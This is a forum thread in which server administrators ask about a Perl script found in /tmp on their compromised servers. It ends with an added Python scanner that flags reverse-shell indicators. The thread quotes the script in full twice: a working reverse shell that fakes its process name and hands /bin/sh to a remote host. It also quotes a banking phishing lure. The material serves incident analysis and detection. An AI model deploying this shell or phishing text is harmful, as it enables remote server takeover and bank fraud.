Old 10-08-2008, 09:31 AM
psousa
Re: Hacking Perl Script

Quote:
Originally Posted by falco85
I was looking through my log files and happened by a file upload that should not have been uploaded (through a script somehow they managed to upload although they shouldn't have access). I then immediately went to the directory the script was inserted into, "/tmp", and opened the file. The first line reads #!/usr/bin/perl and even though I have used Perl before I still don't entirely understand what this script does.

Perl Code:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

I can see that it opens lynx and connects to the local machine, but what does this do:

Perl Code:
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';

I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. I do not really understand what any of this is doing:

Perl Code:
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Can someone help me figure out what the intention of this script is?

Same issue here. Do you have any news on this issue?

My details:

Hello.

Today I found a /tmp script (/tmp/back).
I have APF firewall and anti-DoS, secured tmp's and modsecurity2 on apache2 running gotroot rules.

How can it be possible to write a Perl file to /tmp? The file has no run permissions, but it is a Perl file, so I think they ran it. I found this script after someone sent a mail bomb through the server (about 9000 each time).

Server symptoms:
several connections from my server to ftp.hosteurope.de
several phishing emails being sent over my server

Script code:
Quote:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Brazilian email content:
Quote:
(...) We are performing critical updates on our servers; for this reason you must re-register your account details in order to have access to all Internet Banking Caixa services.
To carry out the update, simply download the Caixa update program from the link below. (...)
How can the server possibly be compromised?

Any help will be appreciated.

Regards.
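As an added example (not code from this thread), a small Python scanner a defender can run over scripts found in /tmp: it flags the behaviours the quoted /tmp/back script combines, namely the outbound connect to $ARGV[0]:$ARGV[1], the redirection of STDIN/STDOUT/STDERR onto the socket, the system() call that ends in /bin/sh, and the $0 reassignment that makes the process show up as "lynx" in ps. The indicator names, the classify() thresholds and the embedded sample input are constructed for this example.

```python
import re

# Constructed input: the /tmp/back reverse shell quoted in the thread, embedded
# here so the scanner runs offline instead of reading a live compromised host.
SAMPLE_SCRIPT = r"""#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
"""

# One regex per behaviour the script relies on; the names are ours, not a standard.
INDICATORS = {
    "outbound_connect": re.compile(r"\bconnect\s*\(\s*\w+\s*,"),      # dials out to a remote host:port
    "stdio_dup_to_socket": re.compile(r'open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*"[<>&]+\s*\w+"'),  # stdio -> socket
    "shell_spawn": re.compile(r"\b(system|exec)\s*\("),              # runs an attacker-supplied command string
    "interactive_sh": re.compile(r"/bin/(ba)?sh\b"),                 # the command ends in an interactive shell
    "argv0_masquerade": re.compile(r"^\s*\$0\s*="),                  # rewrites the process name seen in ps
}


def find_indicators(source: str) -> dict[str, list[int]]:
    """Return indicator name -> 1-based line numbers where it fires."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def classify(source: str) -> str:
    """A reverse shell needs all three: dial out, wire stdio to the socket, spawn a shell."""
    hits = find_indicators(source)
    core = ("outbound_connect", "stdio_dup_to_socket", "shell_spawn")
    if all(name in hits for name in core):
        return "reverse-shell"
    return "suspicious" if hits else "clean"
```

Running classify(SAMPLE_SCRIPT) returns "reverse-shell", and find_indicators() gives the line numbers to quote in an incident note; a script that only matches one or two indicators comes back as "suspicious" for manual review.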